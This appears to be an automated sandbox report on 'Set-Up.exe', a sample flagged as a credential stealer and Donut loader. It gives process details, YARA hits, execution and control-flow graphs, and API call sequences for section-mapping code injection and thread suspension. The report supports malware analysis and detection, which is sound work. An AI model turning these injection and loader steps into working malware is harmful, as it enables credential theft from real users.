                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CkIGTkRWSf%2BGB5DssHJ9UebitVejMMvLqV5g7mazxQcUqifz1qR6K%2BCHzFVB%2F11gZ0rbKpBaQzbuwtJ0WGnUx4S2nhI%2Fs2dDL0eON3gsiM2PSZkPh7PzEFYBZY5V0h2sqqQ74PC4"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 9026bc738fbaaabf-YYZ
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=14271&min_rtt=14269&rtt_var=5355&sent=199&recv=581&lost=0&retrans=0&sent_bytes=2849&recv_bytes=567510&delivery_rate=204395&cwnd=32&unsent_bytes=0&cid=3686241e484252b7&ts=1656&x=0"


                                                                            Click to jump to process

                                                                            Click to jump to process

                                                                            Click to dive into process behavior distribution

                                                                            Target ID:0
                                                                            Start time:10:00:10
                                                                            Start date:15/01/2025
                                                                            Path:C:\Users\user\Desktop\Set-Up.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\Set-Up.exe"
                                                                            Imagebase:0x400000
                                                                            File size:4'180'480 bytes
                                                                            MD5 hash:76F313AD20BD3DA35EF5A7460CAF4F95
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:Borland Delphi
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1940402195.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1984991236.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1937265688.0000000000AC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:1.5%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:31.6%
                                                                              Total number of Nodes:117
                                                                              Total number of Limit Nodes:10
                                                                              execution_graph 12525 2660396 12526 26603a4 12525->12526 12541 2660ce6 12526->12541 12528 266092f 12529 266053c GetPEB 12531 26605b9 12529->12531 12530 26604f7 12530->12528 12530->12529 12544 2660aa6 12531->12544 12534 266061a CreateThread 12535 26605f2 12534->12535 12556 2660956 GetPEB 12534->12556 12540 266082a 12535->12540 12552 2660fa6 GetPEB 12535->12552 12537 266091a TerminateProcess 12537->12528 12538 2660aa6 4 API calls 12538->12540 12540->12537 12554 2660d06 GetPEB 12541->12554 12543 2660cf3 12543->12530 12545 2660abc CreateToolhelp32Snapshot 12544->12545 12547 26605ec 12545->12547 12548 2660af3 Thread32First 12545->12548 12547->12534 12547->12535 12548->12547 12549 2660b1a 12548->12549 12549->12547 12550 2660b51 Wow64SuspendThread 12549->12550 12551 2660b7b CloseHandle 12549->12551 12550->12551 12551->12549 12553 2660674 12552->12553 12553->12538 12553->12540 12555 2660d21 12554->12555 12555->12543 12557 26609af 12556->12557 12558 2660a5c 12557->12558 12559 2660a0f CreateThread 12557->12559 12559->12557 12560 2661186 12559->12560 12563 26adb4b 12560->12563 12564 26adc5a 12563->12564 12565 26adb70 12563->12565 12575 26aee26 12564->12575 12599 26b03cd 12565->12599 12568 26adb88 12569 26b03cd LoadLibraryA 12568->12569 12574 266118b 12568->12574 12570 26adbca 12569->12570 12571 26b03cd LoadLibraryA 12570->12571 12572 26adbe6 12571->12572 12573 26b03cd LoadLibraryA 12572->12573 12573->12574 12576 26b03cd LoadLibraryA 12575->12576 12577 26aee49 12576->12577 12578 26b03cd LoadLibraryA 12577->12578 12579 26aee61 12578->12579 12580 26b03cd LoadLibraryA 12579->12580 12581 26aee7f 12580->12581 12582 26aee94 VirtualAlloc 12581->12582 12591 26aeea8 12581->12591 12584 26aeec2 12582->12584 12582->12591 12583 26b03cd LoadLibraryA 12585 26aef40 12583->12585 12584->12583 12598 26af11b 12584->12598 12588 26aef96 12585->12588 12585->12591 12603 26b01d4 12585->12603 12586 26b03cd LoadLibraryA 12586->12588 12588->12586 12590 26aeff8 12588->12590 12588->12598 12589 26af1d9 VirtualFree 12589->12591 12597 26af05a 12590->12597 12590->12598 12631 26adfb6 12590->12631 12591->12574 12593 26af043 12593->12598 12638 26ae0b1 12593->12638 12596 26af178 12596->12596 12597->12598 12607 26af556 12597->12607 12598->12589 12598->12596 12601 26b03e4 12599->12601 12600 26b040b 12600->12568 12601->12600 12657 26ae4d2 12601->12657 12604 26b01e9 12603->12604 12605 26b025f LoadLibraryA 12604->12605 12606 26b0269 12604->12606 12605->12606 12606->12585 12608 26af591 12607->12608 12609 26af5d8 NtCreateSection 12608->12609 12611 26af5fd 12608->12611 12630 26afc05 12608->12630 12609->12611 12609->12630 12610 26af692 NtMapViewOfSection 12618 26af6b2 12610->12618 12611->12610 12611->12630 12612 26af9db VirtualAlloc 12619 26afa1d 12612->12619 12613 26b01d4 LoadLibraryA 12613->12618 12614 26b01d4 LoadLibraryA 12621 26af939 12614->12621 12615 26aface VirtualProtect 12616 26afb99 VirtualProtect 12615->12616 12622 26afaee 12615->12622 12625 26afbc8 12616->12625 12617 26af9d7 12617->12612 12618->12613 12620 26b0272 LoadLibraryA 12618->12620 12618->12621 12618->12630 12619->12615 12627 26afabb NtMapViewOfSection 12619->12627 12619->12630 12620->12618 12621->12612 12621->12614 12621->12617 12643 26b0272 12621->12643 12622->12616 12628 26afb73 VirtualProtect 12622->12628 12624 26afd1b CreateThread 12624->12630 12629 26afd13 12625->12629 12625->12630 12647 26aff87 12625->12647 12627->12615 12627->12630 12628->12622 12629->12624 12629->12630 12630->12598 12632 26b01d4 LoadLibraryA 12631->12632 12633 26adfca 12632->12633 12634 26b0272 LoadLibraryA 12633->12634 12637 26adfd2 12633->12637 12635 26adfea 12634->12635 12636 26b0272 LoadLibraryA 12635->12636 12635->12637 12636->12637 12637->12593 12639 26b01d4 LoadLibraryA 12638->12639 12640 26ae0c7 12639->12640 12641 26b0272 LoadLibraryA 12640->12641 12642 26ae0d7 12641->12642 12642->12597 12644 26b03a3 12643->12644 12645 26b028d 12643->12645 12644->12621 12645->12644 12651 26ae677 12645->12651 12648 26affaf 12647->12648 12649 26b01a1 12648->12649 12650 26b0272 LoadLibraryA 12648->12650 12649->12629 12650->12648 12652 26ae6bc 12651->12652 12655 26ae696 12651->12655 12653 26b01d4 LoadLibraryA 12652->12653 12654 26ae6c9 12652->12654 12653->12654 12654->12644 12655->12652 12655->12654 12656 26b0272 LoadLibraryA 12655->12656 12656->12655 12658 26ae5d7 12657->12658 12659 26ae4f2 12657->12659 12658->12601 12659->12658 12660 26ae677 LoadLibraryA 12659->12660 12660->12658
                                                                              APIs
                                                                              • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 026AF5EF
                                                                              • NtMapViewOfSection.NTDLL(?,00000000), ref: 026AF697
                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 026AFA0B
                                                                              • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 026AFAC0
                                                                              • VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 026AFADD
                                                                              • VirtualProtect.KERNEL32(?,?,?,00000000), ref: 026AFB80
                                                                              • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 026AFBB3
                                                                              • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 026AFD24
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1984991236.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2660000_Set-Up.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Virtual$ProtectSection$CreateView$AllocThread
                                                                              • String ID:
                                                                              • API String ID: 1248616170-0
                                                                              • Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                              • Instruction ID: 2e72c237d50925f50f82301550f9ac5557a05054f1d5ec6e553cc12816c760ca
                                                                              • Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                              • Instruction Fuzzy Hash: 6E429871608341AFDB24CF24C854BABBBE9EF88704F14492DF9859B691D732E841CF92

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 187 2660396-26604fe call 2660946 call 2660f46 call 26610f6 call 2660ce6 196 2660504-266050b 187->196 197 266092f-2660932 187->197 198 2660516-266051a 196->198 199 266053c-26605b7 GetPEB 198->199 200 266051c-266053a call 2660e66 198->200 201 26605c2-26605c6 199->201 200->198 203 26605de-26605f0 call 2660aa6 201->203 204 26605c8-26605dc 201->204 210 26605f2-2660618 203->210 211 266061a-266063b CreateThread 203->211 204->201 212 266063e-2660642 210->212 211->212 214 2660903-266092d TerminateProcess 212->214 215 2660648-266067b call 2660fa6 212->215 214->197 215->214 219 2660681-26606d0 215->219 221 26606db-26606e1 219->221 222 26606e3-26606e9 221->222 223 2660729-266072d 221->223 224 26606fc-2660700 222->224 225 26606eb-26606fa 222->225 226 2660733-2660740 223->226 227 26607fb-26608ee call 2660aa6 call 2660946 call 2660f46 223->227 228 2660727 224->228 229 2660702-2660710 224->229 225->224 230 266074b-2660751 226->230 253 26608f3-26608fd 227->253 254 26608f0 227->254 228->221 229->228 231 2660712-2660724 229->231 234 2660753-2660761 230->234 235 2660781-2660784 230->235 231->228 238 2660763-2660772 234->238 239 266077f 234->239 236 2660787-266078e 235->236 236->227 241 2660790-2660799 236->241 238->239 243 2660774-266077d 238->243 239->230 241->227 244 266079b-26607ab 241->244 243->235 246 26607b6-26607c2 244->246 249 26607c4-26607f1 246->249 250 26607f3-26607f9 246->250 249->246 250->236 253->214 254->253
                                                                              APIs
                                                                              • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 02660639
                                                                              • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 0266092D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1984991236.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2660000_Set-Up.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateProcessTerminateThread
                                                                              • String ID: $CP$TU=Q$J~
                                                                              • API String ID: 1197810419-1734471447
                                                                              • Opcode ID: 9fc2e2b2e5c46df0a7c3f9032a4e3a07a5967c215bef6d2b7323fb27b1c27db0
                                                                              • Instruction ID: 9862c659e4ecb958434b9be91c48cdabb0c927e3fe9de37a0d8ab7d362573cfe
                                                                              • Opcode Fuzzy Hash: 9fc2e2b2e5c46df0a7c3f9032a4e3a07a5967c215bef6d2b7323fb27b1c27db0
                                                                              • Instruction Fuzzy Hash: 7E12C2B5E00219DFDB14CF98C994BADBBB2FF88304F2482A9D515AB385D734AA41CF54

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 255 2660aa6-2660aed CreateToolhelp32Snapshot 258 2660bc3-2660bc6 255->258 259 2660af3-2660b14 Thread32First 255->259 260 2660baf-2660bbe 259->260 261 2660b1a-2660b20 259->261 260->258 262 2660b22-2660b28 261->262 263 2660b8f-2660ba9 261->263 262->263 264 2660b2a-2660b49 262->264 263->260 263->261 264->263 267 2660b4b-2660b4f 264->267 268 2660b67-2660b76 267->268 269 2660b51-2660b65 Wow64SuspendThread 267->269 270 2660b7b-2660b8d CloseHandle 268->270 269->270 270->263
                                                                              APIs
                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,026605EC,?,00000001,?,81EC8B55,000000FF), ref: 02660AE4
                                                                              • Thread32First.KERNEL32(00000000,0000001C), ref: 02660B10
                                                                              • Wow64SuspendThread.KERNEL32(00000000), ref: 02660B63
                                                                              • CloseHandle.KERNEL32(00000000), ref: 02660B8D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1984991236.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2660000_Set-Up.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
                                                                              • String ID:
                                                                              • API String ID: 1849706056-0
                                                                              • Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                              • Instruction ID: 925852dd94eb7b53114b040dc57b07627e0858d054ea145f7f6f354073fb5db4
                                                                              • Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                              • Instruction Fuzzy Hash: A3411A71A00109AFDB18DF98C894FADB7B6EF88304F10C068E6159B7A4DB75AE45CB94

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 271 2660956-26609ad GetPEB 272 26609b8-26609bc 271->272 273 26609c2-26609cd 272->273 274 2660a5c-2660a63 272->274 276 2660a57 273->276 277 26609d3-26609ea 273->277 275 2660a6e-2660a72 274->275 279 2660a74-2660a81 275->279 280 2660a83-2660a8a 275->280 276->272 281 2660a0f-2660a27 CreateThread 277->281 282 26609ec-2660a0d 277->282 279->275 285 2660a93-2660a98 280->285 286 2660a8c-2660a8e 280->286 283 2660a2b-2660a33 281->283 282->283 283->276 288 2660a35-2660a52 283->288 286->285 288->276
                                                                              APIs
                                                                              • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 02660A22
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1984991236.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2660000_Set-Up.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateThread
                                                                              • String ID: ,
                                                                              • API String ID: 2422867632-3772416878
                                                                              • Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                              • Instruction ID: e24390639c47954581bbb26d6960e05bb71bba0cd3b0611771fb10c7bb9db284
                                                                              • Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                              • Instruction Fuzzy Hash: A941A674A00209EFDB18CF98C994BAEB7B1FF88314F2081A8D5156B395D775AE81CF94

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 290 26b01d4-26b01e7 291 26b01e9-26b01ec 290->291 292 26b01ff-26b0209 290->292 293 26b01ee-26b01f1 291->293 294 26b020b-26b0213 292->294 295 26b0218-26b0224 292->295 293->292 297 26b01f3-26b01fd 293->297 294->295 296 26b0227-26b022c 295->296 298 26b025f-26b0266 LoadLibraryA 296->298 299 26b022e-26b0239 296->299 297->292 297->293 302 26b0269-26b026d 298->302 300 26b023b-26b0253 call 26b08a2 299->300 301 26b0255-26b0259 299->301 300->301 306 26b026e-26b0270 300->306 301->296 304 26b025b-26b025d 301->304 304->298 304->302 306->302
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(00000000,?,?), ref: 026B0266
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1984991236.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2660000_Set-Up.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID: .dll
                                                                              • API String ID: 1029625771-2738580789
                                                                              • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                              • Instruction ID: 8598917450a3f463650cc14a9370683e03e69103ca7722d859869f6eab508fa2
                                                                              • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                              • Instruction Fuzzy Hash: E221B735A042959FDB26DFACC884BBF7FA8AF05224F18416DD8459BB41D770E8898740

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 307 26aee26-26aee8a call 26b03cd * 3 314 26aee8c-26aee8e 307->314 315 26aeeb4 307->315 314->315 317 26aee90-26aee92 314->317 316 26aeeb7-26aeec1 315->316 317->315 318 26aee94-26aeea6 VirtualAlloc 317->318 319 26aeea8-26aeeaf 318->319 320 26aeec2-26aeee5 call 26b0842 call 26b0866 318->320 319->315 322 26aeeb1 319->322 326 26aef2f-26aef48 call 26b03cd 320->326 327 26aeee7-26aef1d call 26b053a call 26b0410 320->327 322->315 326->315 332 26aef4e 326->332 338 26af17e-26af187 327->338 339 26aef23-26aef29 327->339 334 26aef54-26aef5a 332->334 336 26aef5c-26aef62 334->336 337 26aef96-26aef9f 334->337 340 26aef64-26aef67 336->340 341 26aeff8-26af003 337->341 342 26aefa1-26aefa7 337->342 343 26af189-26af18c 338->343 344 26af18e-26af196 338->344 339->326 339->338 347 26aef7b-26aef7d 340->347 348 26aef69-26aef6e 340->348 345 26af01c-26af01f 341->345 346 26af005-26af00e call 26ae11a 341->346 349 26aefab-26aefc6 call 26b03cd 342->349 343->344 350 26af1c5 343->350 344->350 351 26af198-26af1c3 call 26b0866 344->351 356 26af17a 345->356 357 26af025-26af02e 345->357 346->356 367 26af014-26af01a 346->367 347->337 355 26aef7f-26aef8d call 26b01d4 347->355 348->347 354 26aef70-26aef79 348->354 372 26aefc8-26aefd0 349->372 373 26aefe5-26aeff6 349->373 353 26af1c9-26af1e9 call 26b0866 VirtualFree 350->353 351->353 378 26af1eb 353->378 379 26af1ef-26af1f1 353->379 354->340 354->347 369 26aef92-26aef94 355->369 356->338 364 26af030 357->364 365 26af034-26af03b 357->365 364->365 370 26af06b-26af06f 365->370 371 26af03d-26af046 call 26adfb6 365->371 367->365 369->334 376 26af111-26af114 370->376 377 26af075-26af097 370->377 387 26af048-26af04e 371->387 388 26af054-26af05d call 26ae0b1 371->388 372->356 374 26aefd6-26aefdf 372->374 373->341 373->349 374->356 374->373 381 26af166-26af168 call 26af556 376->381 382 26af116-26af119 376->382 377->356 393 26af09d-26af0b0 call 26b0842 377->393 378->379 379->316 392 26af16d-26af16e 381->392 382->381 384 26af11b-26af11e 382->384 390 26af120-26af122 384->390 391 26af137-26af148 call 26aec17 384->391 387->356 387->388 388->370 399 26af05f-26af065 388->399 390->391 395 26af124-26af127 390->395 408 26af14a-26af156 call 26af1f6 391->408 409 26af159-26af164 call 26ae6e3 391->409 396 26af16f-26af176 392->396 406 26af0b2-26af0b6 393->406 407 26af0d4-26af10d 393->407 400 26af129-26af12c 395->400 401 26af12e-26af135 call 26afdc4 395->401 396->356 402 26af178 396->402 399->356 399->370 400->396 400->401 401->392 402->402 406->407 413 26af0b8-26af0bb 406->413 407->356 418 26af10f 407->418 408->409 409->392 413->376 417 26af0bd-26af0d2 call 26b0645 413->417 417->418 418->376
                                                                              APIs
                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 026AEEA0
                                                                              • VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 026AF1E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1984991236.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2660000_Set-Up.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Virtual$AllocFree
                                                                              • String ID:
                                                                              • API String ID: 2087232378-0
                                                                              • Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                              • Instruction ID: aee189b957525ecc5ff9bcb8255174225219165c7d66728a30a87d7c6baf0295
                                                                              • Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                              • Instruction Fuzzy Hash: CBB1C271500B02ABDB369E60CCA0BA7BBE9FF05314F14052DF95996650E732ED51CFA2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1984991236.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2660000_Set-Up.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $ $!$"$#$%$%$'$($($+$+$,$,$0$2$2$2$4$6$7$8$9$:$:$;$=$=$D$D$E$H$I$M$M$M$O$O$Q$T$`$`$a$c$d$e$e$f$g$g$h$h$i$i$j$k$l$l$m$n$n$n$o$o$t$v$w$y$z
                                                                              • API String ID: 0-1168452332
                                                                              • Opcode ID: cd1950757bcb56ccb3c05197a421adc7346e6e956f1bdfc74bc5e3c418f05ba2
                                                                              • Instruction ID: c12cff597f1adea9c817d51b167c4ed53ea54ceb0bfaf678d08cdd4b25740af5
                                                                              • Opcode Fuzzy Hash: cd1950757bcb56ccb3c05197a421adc7346e6e956f1bdfc74bc5e3c418f05ba2
                                                                              • Instruction Fuzzy Hash: BF03DF7150C7C18AC3359B3898483AFBFE1AB96324F088A6DD4E9873D1DB798446CB57

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 853 268411e-26842ab 854 26842ad-26842b0 853->854 855 26842cf-26842f7 854->855 856 26842b2-26842cd 854->856 857 26842f9-26842fc 855->857 856->854 858 26842fe-268431f 857->858 859 2684321-2684367 857->859 858->857 860 2684369-268436c 859->860 861 268436e-2684383 860->861 862 2684385-26846ca call 266a923 * 5 860->862 861->860 873 26846cc-26846cf 862->873 874 2684720-2684754 873->874 875 26846d1-268471e 873->875 876 2684756-2684759 874->876 875->873 877 268475b-268479a 876->877 878 268479c-26847f0 call 266cf43 876->878 877->876
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1984991236.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2660000_Set-Up.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: !$#$$$'$*$+$,$,$.$2$7$;$<$?$A$C$E$G$I$K$M$O$P$Q$R$S$T$U$W$W$X$Y$[$[$_$_$a$c$e$g$i$k$m$o$q$s$u$w$y${${$}
                                                                              • API String ID: 0-1732998363
                                                                              • Opcode ID: ebea3ace2697a5afeb16cad6def4a697057872c99277c015847f6c4aa40287e0
                                                                              • Instruction ID: 4165f801e8863bb66ec6a3034237253200d574abc9253620a0eb83e909fb2223
                                                                              • Opcode Fuzzy Hash: ebea3ace2697a5afeb16cad6def4a697057872c99277c015847f6c4aa40287e0
                                                                              • Instruction Fuzzy Hash: 5722E51080CBEAC9DB32C67C9C4879DBF611B23224F1843D9D0F96B2D6D7750A86DB66

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 918 2680853-268086e 919 2680873-268087c 918->919 919->919 920 268087e-2680885 919->920 921 2680893-268089c 920->921 921->921 922 268089e-26808ce 921->922 923 26808d0-26808d5 922->923 924 26808d7-26808d9 922->924 925 26808e0-2680972 call 26697f3 923->925 924->925 928 2680973-26809b6 925->928 928->928 929 26809b8-2680a46 928->929 930 2680a53-2680a8e 929->930 930->930 931 2680a90-2680aa6 930->931 932 2680aa8-2680aad 931->932 933 2680ac4-2680ad0 931->933 934 2680ab3-2680ac2 932->934 935 2680ad2-2680ad6 933->935 936 2680af4-2680aff 933->936 934->933 934->934 937 2680ae3-2680af2 935->937 938 2680b01-2680b04 936->938 939 2680b24-2680b31 936->939 937->936 937->937 940 2680b13-2680b22 938->940 941 2680b33-2680b37 939->941 942 2680b54-2680b67 939->942 940->939 940->940 944 2680b43-2680b52 941->944 943 2680b73-2680b7c 942->943 943->943 945 2680b7e-2680b9b 943->945 944->942 944->944 946 2680ba3-2680bac 945->946 946->946 947 2680bae-2680bcb 946->947 948 2680bd3-2680bdc 947->948 948->948 949 2680bde-2680bef 948->949 950 2680bf8 949->950 951 2680bf1-2680bf6 949->951 952 2680bfa-2680c2d call 26697f3 950->952 951->952 955 2680c33-2680c5b 952->955 955->955 956 2680c5d-2680c66 955->956 957 2680c68-2680c6e 956->957 958 2680c84-2680c8f 956->958 961 2680c73-2680c82 957->961 959 2680c91-2680c94 958->959 960 2680cb4-2680ccb 958->960 962 2680ca3-2680cb2 959->962 963 2680ccd-2680cd2 960->963 964 2680ce4-2680cf2 960->964 961->958 961->961 962->960 962->962 965 2680cd3-2680ce2 963->965 966 2680cf3-2680d13 964->966 965->964 965->965 966->966 967 2680d15-2680d2e 966->967 968 2680d30 967->968 969 2680d44-2680d52 967->969 970 2680d33-2680d42 968->970 971 2680d53-2680d91 969->971 970->969 970->970 971->971 972 2680d93-2680d9e 971->972 973 2680da3-2680dcb 972->973 973->973 974 2680dcd-2680de8 call 26811a3 973->974
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1984991236.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2660000_Set-Up.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: &h]n$(X+^$+\8R$-L8B$-d.z$4@$F$Aw$Ct$Hr$Mx0~$TG$W`(f$Yl$b
                                                                              • API String ID: 0-343601620
                                                                              • Opcode ID: 31fb9d7cda7e14f501f8ddddfaac54f4dae8fd05f2bad1d70a5b0fd0742564cf
                                                                              • Instruction ID: 76f6df6c1ea81d6d262b028806b6badcaa9f3d2cd7a7fde45b673ac86e6582f3
                                                                              • Opcode Fuzzy Hash: 31fb9d7cda7e14f501f8ddddfaac54f4dae8fd05f2bad1d70a5b0fd0742564cf
                                                                              • Instruction Fuzzy Hash: 1CD114B16183108BD724DF24C86276BB7F2EFD6354F088A5CD5C28B3A4E7759909CB92
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1984991236.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2660000_Set-Up.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: >$T$\$b$f$j$k$x$x$y
                                                                              • API String ID: 0-2256232739
                                                                              • Opcode ID: 6997c8941c416139f3cdbff7e612643fe5a3e27715ecb606f746a154dfc27e4e
                                                                              • Instruction ID: 484b8abd9d2954beb8ae7539cf2f37e832f02d9937f98bd0e1c440d3f59c46d7
                                                                              • Opcode Fuzzy Hash: 6997c8941c416139f3cdbff7e612643fe5a3e27715ecb606f746a154dfc27e4e
                                                                              • Instruction Fuzzy Hash: A912A27160C7808BD328DB38D4A43AEBBE2AFC5310F194A2ED9D987391DB758945CB43
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1984991236.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2660000_Set-Up.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: "/W$%"$<=$C$X$\$vh/6${WPQ$,
                                                                              • API String ID: 0-1806767623
                                                                              • Opcode ID: b840dc5cd3e1ad98a609f69922b2e150d7b0e3306ac93c808360b46a54e85571
                                                                              • Instruction ID: aed1e521480d888c6746dbd50e182a86356d8b61d5302debd616c4a140c321c6
                                                                              • Opcode Fuzzy Hash: b840dc5cd3e1ad98a609f69922b2e150d7b0e3306ac93c808360b46a54e85571
                                                                              • Instruction Fuzzy Hash: 7032DE71A083419FE710CF65D885B9BBBE6EFC5318F18892CE5948B391DB75D806CB42
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1984991236.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2660000_Set-Up.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: !@$,$2$<$=$M$b$d$e
                                                                              • API String ID: 0-511976128
                                                                              • Opcode ID: fcbfd8d0f24e684a48a1df3a316dcc2e65bbb40cb84913161c0eee7eb5f07272
                                                                              • Instruction ID: 92576ff4e8f43e2dca380869a1c0057a3fcaa3bc747ef90e96620ab87afb8b03
                                                                              • Opcode Fuzzy Hash: fcbfd8d0f24e684a48a1df3a316dcc2e65bbb40cb84913161c0eee7eb5f07272
